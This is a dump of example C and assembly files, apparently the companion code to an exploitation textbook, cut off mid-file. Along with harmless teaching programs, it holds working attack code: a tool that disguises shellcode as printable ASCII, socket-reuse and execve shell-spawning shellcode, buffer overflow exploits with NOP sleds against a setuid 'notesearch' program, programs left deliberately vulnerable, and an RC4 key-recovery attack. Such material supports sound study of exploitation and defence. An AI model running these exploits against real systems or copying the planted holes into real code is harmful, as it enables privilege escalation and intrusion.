printf("\t\t{ Header Size: %u\tFlags: ", header_size); 101 | if(tcp_header->tcp_flags & TCP_FIN) 102 | printf("FIN "); 103 | if(tcp_header->tcp_flags & TCP_SYN) 104 | printf("SYN "); 105 | if(tcp_header->tcp_flags & TCP_RST) 106 | printf("RST "); 107 | if(tcp_header->tcp_flags & TCP_PUSH) 108 | printf("PUSH "); 109 | if(tcp_header->tcp_flags & TCP_ACK) 110 | printf("ACK "); 111 | if(tcp_header->tcp_flags & TCP_URG) 112 | printf("URG "); 113 | printf(" }\n"); 114 | 115 | return header_size; 116 | } 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /dissembler.c: -------------------------------------------------------------------------------- 1 | /*********************************************************\ 2 | * dissembler ver. 0.9 * File: dissembler.c * 3 | *********************************************************** 4 | * * 5 | * Author: Jon Erickson <matrix@phiral.com> * 6 | * Organization: Phiral Research Laboratories * 7 | * * 8 | * Like a wolf in sheeps clothing, evil byte code that * 9 | * has been dissembled looks like an innocent string. * 10 | * * 11 | * dissemble - dis'sem'ble * 12 | * 1. To disguise or conceal behind a false appearance * 13 | * 2. To make a false show of; feign * 14 | * * 15 | \*********************************************************/ 16 | 17 | /* FOR EDUCATIONAL PURPOSES ONLY */ 18 | 19 | #include <stdio.h> 20 | #include <sys/stat.h> 21 | #include <ctype.h> 22 | #include <time.h> 23 | #include <stdlib.h> 24 | #include <string.h> 25 | 26 | #define VERSION "0.9" 27 | #define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-" 28 | #define MAX_CHR 128 29 | 30 | void usage(char *); 31 | void banner(); 32 | char *gen(unsigned int, unsigned int, char *); 33 | 34 | int main(int argc, char* argv[]) 35 | { 36 | unsigned int targ=0, next=0, last=0xbfffffe0; 37 | int i, j, k, len, norm, pad, opt; 38 | int size=0, esc=0, ninja=0, bridge=-1; 39 | char *head=0, *body, *mem, *code=0; 40 | struct stat buff; 41 | FILE *fh; 42 | extern char *optarg; 43 | extern int optind; 44 | 45 | banner(); 46 | if(argc < 2) usage(argv[0]); 47 | 48 | srand(time(NULL)); 49 | len = strlen(CHR); 50 | while((opt = getopt(argc, argv, "Nt:s:b:c:w:e")) != EOF) 51 | { 52 | switch(opt) 53 | { 54 | case 't': 55 | targ = strtoul(optarg, NULL, 0); 56 | fprintf(stderr, "[t] Target address: %p\n", targ); 57 | break; 58 | case 'N': 59 | ninja = 4; 60 | fprintf(stderr, "[N] Ninja Magic Optimization: ON\n"); 61 | break; 62 | case 's': 63 | size = atoi(optarg); 64 | if(size) 65 | { 66 | fprintf(stderr, "[s] Size changes target: ON "); 67 | fprintf(stderr, "(adjust size: %d bytes)\n", size); 68 | } 69 | break; 70 | case 'b': 71 | bridge = atoi(optarg); 72 | fprintf(stderr, "[b] Bridge size: %d words\n", bridge); 73 | break; 74 | case 'c': 75 | code = optarg; 76 | len = strlen(optarg); 77 | fprintf(stderr, "[c] Using charset: %s (%d)\n", code, strlen(code)); 78 | break; 79 | case 'w': 80 | head = optarg; 81 | fprintf(stderr, "[w] Write to Output File: %s \n", head); 82 | break; 83 | case 'e': 84 | esc = 1; 85 | fprintf(stderr, "[e] Escape the backslash: ON\n"); 86 | break; 87 | } 88 | } 89 | 90 | if(size && !ninja) 91 | { 92 | fprintf(stderr, "[!] Size adjustment needs ninja magic.. enabling..\n"); 93 | fprintf(stderr, "[N] Ninja Magic Optimization: ON\n"); 94 | ninja = 4; 95 | } 96 | 97 | if(stat(argv[optind], &buff)) 98 | { 99 | fprintf(stderr,"\nError: problem with source bytecode file: %s\n", argv[optind]); 100 | exit(-1); 101 | } 102 | norm = buff.st_size; 103 | pad = (norm%4)+4; 104 | mem = (char *) malloc(((norm+pad)*7)+len+62)+21; 105 | if(code) 106 | strncpy(mem, code, len); 107 | else 108 | strncpy(mem, CHR, len); 109 | mem[len] = 0; 110 | code = mem + len + 2; 111 | memset(code, 0x90, 8); 112 | fh = fopen(argv[optind], "r"); 113 | fread(code+pad, norm, 1, fh); 114 | fclose(fh); 115 | 116 | if(head) 117 | { 118 | fh = fopen(head, "w"); 119 | if(!fh) 120 | { 121 | fprintf(stderr, "\nError: Couldn't open output file: %s\n", head); 122 | exit(-1); 123 | } 124 | } 125 | else 126 | fh = stdout; 127 | 128 | head = code + norm+pad+1; 129 | body = head + 38; 130 | 131 | if(targ) 132 | { 133 | last = targ + 20+ (norm+pad)*5; 134 | fprintf(stderr,"[+] Ending address: %p\n", last); 135 | if((bridge<0) && !(ninja)) bridge = norm/4; 136 | } 137 | else 138 | targ = last; 139 | 140 | fprintf(stderr, "[*] Dissembling bytecode from \'%s\'...\n", argv[optind]); 141 | opt = strlen(mem); 142 | head[0] = head[5] = head[10] = 37; 143 | for(i=1; i < 5; i++) 144 | { 145 | strfry(mem); 146 | for(j=0; j < opt; j++) 147 | { 148 | for(k=opt-1; k >= 0; k--) 149 | { 150 | if(!(mem[j] & mem[k] & 0xff)) 151 | { 152 | head[i] = mem[j]; 153 | head[i+5] = mem[k]; 154 | k = -1; j = opt; 155 | head[10]++; 156 | } 157 | } 158 | } 159 | } 160 | if(head[10] != 41) 161 | { 162 | fprintf(stderr,"\nError: Cannot dissemble header with current charset."); 163 | fprintf(stderr,"\ncharset: %s (%d)\n", mem, strlen(mem)); 164 | exit(-1); 165 | } 166 | opt = j = 0; 167 | 168 | magic: 169 | strfry(mem); 170 | sprintf(head+10, "%sP\\", gen(last, next, mem)); 171 | 172 | bzero(body, (norm+pad)*5); 173 | for(k=norm+pad-4; k >=ninja; k=k-4) 174 | { 175 | sscanf(code+k,"%4c",&next); 176 | strfry(mem); 177 | strcat(body, gen(next, last, mem)); 178 | strcat(body, "P"); 179 | last = next; 180 | } 181 | len = opt; 182 | opt = strlen(head) + strlen(body); 183 | if((opt != len) && (j<34) && ninja) 184 | { 185 | fprintf(stderr, "[&] Optimizing with ninja magic...\n"); 186 | last = targ + norm + opt; 187 | if(size) 188 | { 189 | last = last+size-opt; 190 | fprintf(stderr, "[&] Adjusting target address to %p..\n", targ+size-opt); 191 | } 192 | next = 0; 193 | j++; 194 | if(j > 12) 195 | { 196 | j = 56; 197 | fprintf(stderr, "[!] Indecision is my enemy : selecting the best...\n"); 198 | if(opt < len) goto freedom; 199 | } 200 | goto magic; 201 | } 202 | freedom: 203 | if(bridge>0) opt+=bridge; 204 | fprintf(stderr, "\n[+] dissembled bytecode is %d bytes long.\n--\n", opt); 205 | if(esc) 206 | fprintf(fh, "%s\\%s", head, body); 207 | else 208 | fprintf(fh, "%s%s", head, body); 209 | 210 | if(!ninja) 211 | { 212 | if(bridge<0) 213 | bridge = norm+pad; 214 | for(i=0; i < bridge; i++) 215 | fprintf(fh, "P"); 216 | } 217 | fprintf(fh,"\n"); 218 | if(fh != stdout) close(fh); 219 | free(mem-21); 220 | } 221 | 222 | void banner() 223 | { 224 | fprintf(stderr, "dissembler %s - polymorphs bytecode to a printable ASCII string\n", VERSION); 225 | fprintf(stderr, " - Jon Erickson <matrix@phiral.com> Phiral Research Labs -\n"); 226 | fprintf(stderr, " 438C 0255 861A 0D2A 6F6A 14FA 3229 4BD7 5ED9 69D0\n\n"); 227 | } 228 | 229 | void usage(char *name) 230 | { 231 | printf("Usage: %s [switches] bytecode\n", name); 232 | printf("\nOptional dissembler switches:\n"); 233 | printf(" -t <target address> near where the bytecode is going\n"); 234 | printf(" -N optimize with ninja magic\n"); 235 | printf(" -s <original size> size changes target, adjust with orig size\n"); 236 | printf(" -b <NOP bridge size> number of words in the NOP bridge\n"); 237 | printf(" -c <charset> which chars are considered printable\n"); 238 | printf(" -w <output file> write dissembled code to output file\n"); 239 | printf(" -e escape the backlash in output\n"); 240 | printf("\n"); 241 | exit(0); 242 | } 243 | 244 | char* gen(unsigned int targ, unsigned int last, char *X) 245 | { 246 | unsigned int t[4], l[4]; 247 | unsigned int try, single, carry=0; 248 | int a, i, j, k, m, z, flag=0; 249 | char p[MAX_CHR],q[MAX_CHR],r[MAX_CHR],s[MAX_CHR], *pr=X-21; 250 | int len = strlen(X); 251 | 252 | for(a=0; a < len+2; a++) 253 | p[a] = q[a] = r[a] = s[a] = a+1; 254 | p[len] = q[len] = r[len] = s[len] = 0; 255 | strfry(p); 256 | strfry(q); 257 | strfry(r); 258 | strfry(s); 259 | 260 | pr[0] = pr[5] = pr[10] = pr[15] = 45; 261 | t[3] = (targ & 0xff000000)>>24; 262 | t[2] = (targ & 0x00ff0000)>>16; 263 | t[1] = (targ & 0x0000ff00)>>8; 264 | t[0] = (targ & 0x000000ff); 265 | l[3] = (last & 0xff000000)>>24; 266 | l[2] = (last & 0x00ff0000)>>16; 267 | l[1] = (last & 0x0000ff00)>>8; 268 | l[0] = (last & 0x000000ff); 269 | 270 | for(a=1; a < 5; a++) { 271 | carry = flag = 0; 272 | for(z=0; z < 4; z++) { 273 | for(i=0; i < len; i++) { 274 | for(j=0; j < len; j++) { 275 | for(k=0; k < len; k++) { 276 | for(m=0; m < len; m++) 277 | { 278 | if(a < 2) j = len+1; 279 | if(a < 3) k = len+1; 280 | if(a < 4) m = len+1; 281 | try = t[z] + carry+X[p[i]-1]+X[q[j]-1]+X[r[k]-1]+X[s[m]-1]; 282 | single = (try & 0x000000ff); 283 | if(single == l[z]) 284 | { 285 | carry = (try & 0x0000ff00)>>8; 286 | if(i < len) pr[1+z] = X[p[i]-1]; 287 | if(j < len) pr[6+z] = X[q[j]-1]; 288 | if(k < len) pr[11+z] = X[r[k]-1]; 289 | if(m < len) pr[16+z] = X[s[m]-1]; 290 | i = j = k = m = len+2; 291 | flag++; 292 | } 293 | } 294 | } 295 | } 296 | } 297 | } 298 | if(flag ==4) 299 | { 300 | pr[5*a] = 0; 301 | a = 6; 302 | } 303 | } 304 | if(flag !=4) 305 | { 306 | fprintf(stderr,"\nError: Cannot dissemble bytecode with current charset."); 307 | fprintf(stderr,"\ncharset: %s (%d)\n", X, strlen(X)); 308 | exit(-1); 309 | } 310 | return pr; 311 | } 312 | 313 | -------------------------------------------------------------------------------- /drop_privs.c: -------------------------------------------------------------------------------- 1 | #include <unistd.h> 2 | 3 | void lowered_priviledge_function(unsigned char *ptr) { 4 | char buffer[50]; 5 | 6 | seteuid(5); // drop priviledges to games user 7 | 8 | strcpy(buffer, ptr); 9 | } 10 | 11 | int main(int argc, char *argv[]) { 12 | if (argc > 0) 13 | lowered_priviledge_function(argv[1]); 14 | } 15 | -------------------------------------------------------------------------------- /dtors_sample.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | static void cleanup(void) __attribute__ ((destructor)); 5 | 6 | main() { 7 | printf("Some actions happen in the main() function..\n"); 8 | printf("and then when main() exits, the destructor is called..\n"); 9 | 10 | exit(0); 11 | } 12 | 13 | void cleanup(void) { 14 | printf("In the cleanup function now..\n"); 15 | } 16 | -------------------------------------------------------------------------------- /encoded_socket_reuse_restore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/encoded_socket_reuse_restore -------------------------------------------------------------------------------- /encoded_sockreuserestore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/encoded_sockreuserestore -------------------------------------------------------------------------------- /encoded_sockreuserestore.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | push BYTE 0x02 ; fork is syscall #2 4 | pop eax 5 | int 0x80 ; after the fork, in child process eax == 0 6 | test eax, eax 7 | jz child_process ; in child process spawn a shell 8 | 9 | ; in the parent process, restore tinywebd 10 | lea ebp, [esp+0x68] ; restore EBP 11 | push 0x08048fb7 ; return address 12 | ret ; return 13 | 14 | child_process: 15 | ; re-use existing socket 16 | lea edx, [esp+0x5c] ; put the address of new_sockfd in edx 17 | mov ebx, [edx] ; put the value of new_sockfd in ebx 18 | push BYTE 0x02 19 | pop ecx ; ecx starts at 2 20 | xor eax, eax 21 | dup_loop: 22 | mov BYTE al, 0x3F ; dup2 syscall #63 23 | int 0x80 ; dup2(c, 0) 24 | dec ecx ; count down to 0 25 | jns dup_loop ; if the sign flag is not set, ecx is not negative 26 | 27 | ; execve(const char *filename, char *const argv [], char *const envp[]) 28 | mov BYTE al, 11 ; execve syscall #11 29 | push 0x056d7834 ; push "/sh\x00" encoded +5 to the stack 30 | push 0x736e6734 ; push "/bin" encoded +5 to the stack 31 | mov ebx, esp ; put the address of encoded "/bin/sh" into ebx 32 | 33 | ;int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING) 34 | 35 | push BYTE 0x8 ; need to decode 8 bytes 36 | pop edx 37 | decode_loop: 38 | sub BYTE [ebx+edx], 0x5 39 | dec edx 40 | jns decode_loop 41 | 42 | ;int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING) 43 | 44 | xor edx, edx 45 | push edx ; push 32-bit null terminator to stack 46 | mov edx, esp ; this is an empty array for envp 47 | push ebx ; push string addr to stack above null terminator 48 | mov ecx, esp ; this is the argv array with string ptr 49 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 50 | -------------------------------------------------------------------------------- /encoded_sockreuserestore_dbg.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | push BYTE 0x02 ; fork is syscall #2 4 | pop eax 5 | int 0x80 ; after the fork, in child process eax == 0 6 | test eax, eax 7 | jz child_process ; in child process spawn a shell 8 | 9 | ; in the parent process, restore tinywebd 10 | lea ebp, [esp+0x68] ; restore EBP 11 | push 0x08048fb7 ; return address 12 | ret ; return 13 | 14 | child_process: 15 | ; re-use existing socket 16 | lea edx, [esp+0x5c] ; put the address of new_sockfd in edx 17 | mov ebx, [edx] ; put the value of new_sockfd in ebx 18 | push BYTE 0x02 19 | pop ecx ; ecx starts at 2 20 | xor eax, eax 21 | dup_loop: 22 | mov BYTE al, 0x3F ; dup2 syscall #63 23 | int 0x80 ; dup2(c, 0) 24 | dec ecx ; count down to 0 25 | jns dup_loop ; if the sign flag is not set, ecx is not negative 26 | 27 | ; execve(const char *filename, char *const argv [], char *const envp[]) 28 | mov BYTE al, 11 ; execve syscall #11 29 | push 0x056d7834 ; push "/sh\x00" encoded +5 to the stack 30 | push 0x736e6734 ; push "/bin" encoded +5 to the stack 31 | mov ebx, esp ; put the address of encoded "/bin/sh" into ebx 32 | 33 | int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING) 34 | 35 | push BYTE 0x8 ; need to decode 8 bytes 36 | pop edx 37 | decode_loop: 38 | sub BYTE [ebx+edx], 0x5 39 | dec edx 40 | jns decode_loop 41 | 42 | int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING) 43 | 44 | xor edx, edx 45 | push edx ; push 32-bit null terminator to stack 46 | mov edx, esp ; this is an empty array for envp 47 | push ebx ; push string addr to stack above null terminator 48 | mov ecx, esp ; this is the argv array with string ptr 49 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 50 | -------------------------------------------------------------------------------- /errorchecked_heap.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | void *errorchecked_malloc(unsigned int); // function prototype for errorchecked_malloc() 6 | 7 | int main(int argc, char *argv[]) { 8 | char *char_ptr; // a char pointer 9 | int *int_ptr; // an integer pointer 10 | int mem_size; 11 | 12 | if (argc < 2) // if there aren't commandline arguments, 13 | mem_size = 50; // use 50 as the default value.. 14 | else 15 | mem_size = atoi(argv[1]); 16 | 17 | printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size); 18 | char_ptr = (char *) errorchecked_malloc(mem_size); // allocating heap memory 19 | 20 | strcpy(char_ptr, "This is memory is located on the heap."); 21 | printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr); 22 | 23 | printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n"); 24 | int_ptr = (int *) errorchecked_malloc(12); // allocated heap memory again 25 | 26 | *int_ptr = 31337; // put the value of 31337 where int_ptr is pointing 27 | printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr); 28 | 29 | printf("\t[-] freeing char_ptr's heap memory...\n"); 30 | free(char_ptr); // freeing heap memory 31 | 32 | printf("\t[+] allocating another 15 bytes for char_ptr\n"); 33 | char_ptr = (char *) errorchecked_malloc(15); // allocating more heap memory 34 | 35 | strcpy(char_ptr, "new memory"); 36 | printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr); 37 | 38 | printf("\t[-] freeing int_ptr's heap memory...\n"); 39 | free(int_ptr); // freeing heap memory 40 | printf("\t[-] freeing char_ptr's heap memory...\n"); 41 | free(char_ptr); // freeing the other block of heap memory 42 | } 43 | 44 | void *errorchecked_malloc(unsigned int size) { // an error checked malloc() function 45 | void *ptr; 46 | ptr = malloc(size); 47 | if(ptr == NULL) { 48 | fprintf(stderr, "Error: could not allocate heap memory.\n"); 49 | exit(-1); 50 | } 51 | return ptr; 52 | } 53 | -------------------------------------------------------------------------------- /evil_name: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/evil_name -------------------------------------------------------------------------------- /exec_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/exec_shell -------------------------------------------------------------------------------- /exec_shell.c: -------------------------------------------------------------------------------- 1 | #include <unistd.h> 2 | 3 | int main() { 4 | char filename[] = "/bin/sh\x00"; 5 | char **argv, **envp; // arrays that contain char pointers 6 | 7 | argv[0] = filename; // only argument is filename 8 | argv[1] = 0; // null terminate the argument array 9 | 10 | envp[0] = 0; // null terminate the environment array 11 | 12 | execve(filename, argv, envp); 13 | } 14 | -------------------------------------------------------------------------------- /exec_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | jmp short two ; Jump down to the bottom for the call trick 4 | one: 5 | ; int execve(const char *filename, char *const argv [], char *const envp[]) 6 | pop ebx ; ebx has the addr of the string 7 | xor eax, eax ; put 0 into eax 8 | mov [ebx+7], al ; null terminate the /bin/sh string 9 | mov [ebx+8], ebx ; put addr from ebx where the AAAA is 10 | mov [ebx+12], eax ; put 32-bit null terminator where the BBBB is 11 | lea ecx, [ebx+8] ; load the address of [ebx+8] into ecx for argv ptr 12 | lea edx, [ebx+12] ; edx = ebx + 12, which is the envp ptr 13 | mov al, 11 ; syscall #11 14 | int 0x80 ; do it 15 | 16 | two: 17 | call one ; Use a call to get string address 18 | db '/bin/sh' ; the XAAAABBBB bytes aren't needed 19 | -------------------------------------------------------------------------------- /exploit_buffer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/exploit_buffer -------------------------------------------------------------------------------- /exploit_notesearch.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | char shellcode[]= 5 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 6 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 7 | "\xe1\xcd\x80"; 8 | 9 | int main(int argc, char *argv[]) { 10 | unsigned int i, *ptr, ret, offset=270; 11 | char *command, *buffer; 12 | 13 | command = (char *) malloc(200); 14 | bzero(command, 200); // zero out the new memory 15 | 16 | strcpy(command, "./notesearch \'"); // start command buffer 17 | buffer = command + strlen(command); // set buffer at the end 18 | 19 | if(argc > 1) // set offset 20 | offset = atoi(argv[1]); 21 | 22 | ret = (unsigned int) &i - offset; // set return address 23 | 24 | for(i=0; i < 160; i+=4) // fill buffer with return address 25 | *((unsigned int *)(buffer+i)) = ret; 26 | memset(buffer, 0x90, 60); // build NOP sled 27 | memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 28 | 29 | strcat(command, "\'"); 30 | 31 | system(command); // run exploit 32 | free(command); 33 | } 34 | 35 | -------------------------------------------------------------------------------- /exploit_notesearch_env.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <unistd.h> 5 | 6 | char shellcode[]= 7 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 8 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 9 | "\xe1\xcd\x80"; 10 | 11 | int main(int argc, char *argv[]) { 12 | char *env[2] = {shellcode, 0}; 13 | unsigned int i, ret; 14 | 15 | char *buffer = (char *) malloc(160); 16 | 17 | ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch"); 18 | for(i=0; i < 160; i+=4) 19 | *((unsigned int *)(buffer+i)) = ret; 20 | 21 | execle("./notesearch", "notesearch", buffer, 0, env); 22 | free(buffer); 23 | } 24 | 25 | -------------------------------------------------------------------------------- /fcntl_flags.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <fcntl.h> 3 | 4 | void display_flags(char *, unsigned int); 5 | void binary_print(unsigned int); 6 | 7 | int main(int argc, char *argv[]) { 8 | display_flags("O_RDONLY\t\t", O_RDONLY); 9 | display_flags("O_WRONLY\t\t", O_WRONLY); 10 | display_flags("O_RDWR\t\t\t", O_RDWR); 11 | printf("\n"); 12 | display_flags("O_APPEND\t\t", O_APPEND); 13 | display_flags("O_TRUNC\t\t\t", O_TRUNC); 14 | display_flags("O_CREAT\t\t\t", O_CREAT); 15 | printf("\n"); 16 | display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT); 17 | } 18 | 19 | void display_flags(char *label, unsigned int value) { 20 | printf("%s\t: %d\t:", label, value); 21 | binary_print(value); 22 | printf("\n"); 23 | } 24 | 25 | void binary_print(unsigned int value) { 26 | unsigned int mask = 0xff000000; // start with a mask for the highest byte 27 | unsigned int shift = 256*256*256; // start with a shift for the highest byte 28 | unsigned int byte, byte_iterator, bit_iterator; 29 | 30 | for(byte_iterator=0; byte_iterator < 4; byte_iterator++) { 31 | byte = (value & mask) / shift; // isolate each byte 32 | printf(" "); 33 | for(bit_iterator=0; bit_iterator < 8; bit_iterator++) { // print the byte's bits 34 | if(byte & 0x80) // if the highest bit in the byte isn't 0 35 | printf("1"); // print a 1 36 | else 37 | printf("0"); // otherwise print a 0 38 | byte *= 2; // move all the bits to the left by 1 39 | } 40 | mask /= 256; // move the bits in mask right by 8 41 | shift /= 256; // move the bits in shift right by 8 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /find_jmpesp.c: -------------------------------------------------------------------------------- 1 | int main() 2 | { 3 | unsigned long linuxgate_start = 0xffffe000; 4 | char *ptr = (char *) linuxgate_start; 5 | 6 | int i; 7 | 8 | for(i=0; i < 4096; i++) 9 | { 10 | if(ptr[i] == '\xff' && ptr[i+1] == '\xe4') 11 | printf("found jmp esp at %p\n", ptr+i); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /firstprog.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() 4 | { 5 | int i; 6 | for(i=0; i < 10; i++) 7 | { 8 | printf("Hello World!\n"); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /fms.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | /* RC4 stream cipher */ 4 | int RC4(int *IV, int *key) { 5 | int K[256]; 6 | int S[256]; 7 | int seed[16]; 8 | int i, j, k, t; 9 | 10 | //seed = IV + key; 11 | for(k=0; k<3; k++) 12 | seed[k] = IV[k]; 13 | for(k=0; k<13; k++) 14 | seed[k+3] = key[k]; 15 | 16 | // -= Key Scheduling Algorithm (KSA) =- 17 | //Initialize the arrays 18 | for(k=0; k<256; k++) { 19 | S[k] = k; 20 | K[k] = seed[k%16]; 21 | } 22 | 23 | j=0; 24 | for(i=0; i < 256; i++) { 25 | j = (j + S[i] + K[i])%256; 26 | t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]); 27 | } 28 | 29 | // First step of PRGA for first keystream byte 30 | i = 0; 31 | j = 0; 32 | 33 | i = i + 1; 34 | j = j + S[i]; 35 | 36 | t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]); 37 | 38 | k = (S[i] + S[j])%256; 39 | 40 | return S[k]; 41 | } 42 | 43 | int main(int argc, char *argv[]) { 44 | int K[256]; 45 | int S[256]; 46 | 47 | int IV[3]; 48 | int key[13] = {1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213}; 49 | int seed[16]; 50 | int N = 256; 51 | int i, j, k, t, x, A; 52 | int keystream, keybyte; 53 | 54 | int max_result, max_count; 55 | int results[256]; 56 | 57 | int known_j, known_S; 58 | 59 | if(argc < 2) { 60 | printf("Usage: %s <keybyte to attack>\n", argv[0]); 61 | exit(0); 62 | } 63 | A = atoi(argv[1]); 64 | if((A > 12) || (A < 0)) { 65 | printf("keybyte must be from 0 to 12.\n"); 66 | exit(0); 67 | } 68 | 69 | for(k=0; k < 256; k++) 70 | results[k] = 0; 71 | 72 | IV[0] = A + 3; 73 | IV[1] = N - 1; 74 | 75 | for(x=0; x < 256; x++) { 76 | IV[2] = x; 77 | 78 | keystream = RC4(IV, key); 79 | printf("Using IV: (%d, %d, %d), first keystream byte is %u\n", 80 | IV[0], IV[1], IV[2], keystream); 81 | 82 | printf("Doing the first %d steps of KSA.. ", A+3); 83 | 84 | //seed = IV + key; 85 | for(k=0; k<3; k++) 86 | seed[k] = IV[k]; 87 | for(k=0; k<13; k++) 88 | seed[k+3] = key[k]; 89 | 90 | // -= Key Scheduling Algorithm (KSA) =- 91 | //Initialize the arrays 92 | for(k=0; k<256; k++) { 93 | S[k] = k; 94 | K[k] = seed[k%16]; 95 | } 96 | 97 | j=0; 98 | for(i=0; i < (A + 3); i++) { 99 | j = (j + S[i] + K[i])%256; 100 | t = S[i]; 101 | S[i] = S[j]; 102 | S[j] = t; 103 | } 104 | 105 | if(j < 2) { // If j < 2, then S[0] or S[1] have been disturbed 106 | printf("S[0] or S[1] have been disturbed, discarding..\n"); 107 | } else { 108 | known_j = j; 109 | known_S = S[A+3]; 110 | printf("at KSA iteration #%d, j=%d and S[%d]=%d\n", 111 | A+3, known_j, A+3, known_S); 112 | keybyte = keystream - known_j - known_S; 113 | 114 | while(keybyte < 0) 115 | keybyte = keybyte + 256; 116 | printf("key[%d] prediction = %d - %d - %d = %d\n", 117 | A, keystream, known_j, known_S, keybyte); 118 | results[keybyte] = results[keybyte] + 1; 119 | } 120 | } 121 | max_result = -1; 122 | max_count = 0; 123 | 124 | for(k=0; k < 256; k++) { 125 | if(max_count < results[k]) { 126 | max_count = results[k]; 127 | max_result = k; 128 | } 129 | } 130 | printf("\nFrequency table for key[%d] (* = most frequent)\n", A); 131 | for(k=0; k < 32; k++) { 132 | for(i=0; i < 8; i++) { 133 | t = k+i*32; 134 | if(max_result == t) 135 | printf("%3d %2d*| ", t, results[t]); 136 | else 137 | printf("%3d %2d | ", t, results[t]); 138 | } 139 | printf("\n"); 140 | } 141 | 142 | printf("\n[Actual Key] = ("); 143 | for(k=0; k < 12; k++) 144 | printf("%d, ",key[k]); 145 | printf("%d)\n", key[12]); 146 | 147 | printf("key[%d] is probably %d\n", A, max_result); 148 | } 149 | -------------------------------------------------------------------------------- /fmt_strings.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | char string[10]; 5 | int A = -73; 6 | unsigned int B = 31337; 7 | 8 | strcpy(string, "sample"); 9 | 10 | // Example of printing with different format string 11 | printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A); 12 | printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B); 13 | printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B); 14 | printf("[string] %s Address %08x\n", string, string); 15 | 16 | // Example of unary address operator (dereferencing) and a %x format string 17 | printf("variable A is at address: %08x\n", &A); 18 | } 19 | -------------------------------------------------------------------------------- /fmt_uncommon.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | int main() { 5 | int A = 5, B = 7, count_one, count_two; 6 | 7 | // Example of a %n format string 8 | printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two); 9 | 10 | printf("count_one: %d\n", count_one); 11 | printf("count_two: %d\n", count_two); 12 | 13 | // Stack Example 14 | printf("A is %d and is at %08x. B is %x.\n", A, &A, B); 15 | 16 | exit(0); 17 | } 18 | -------------------------------------------------------------------------------- /fmt_uncommon2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | int main() { 5 | int A = 5, B = 7, count_one, count_two; 6 | 7 | // Example of a %n format string 8 | printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two); 9 | 10 | printf("count_one: %d\n", count_one); 11 | printf("count_two: %d\n", count_two); 12 | 13 | // Stack Example 14 | printf("A is %d and is at %08x. B is %x.\n", A, &A); 15 | 16 | exit(0); 17 | } 18 | -------------------------------------------------------------------------------- /fmt_vuln.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | int main(int argc, char *argv[]) { 6 | char text[1024]; 7 | static int test_val = -72; 8 | 9 | if(argc < 2) { 10 | printf("Usage: %s <text to print>\n", argv[0]); 11 | 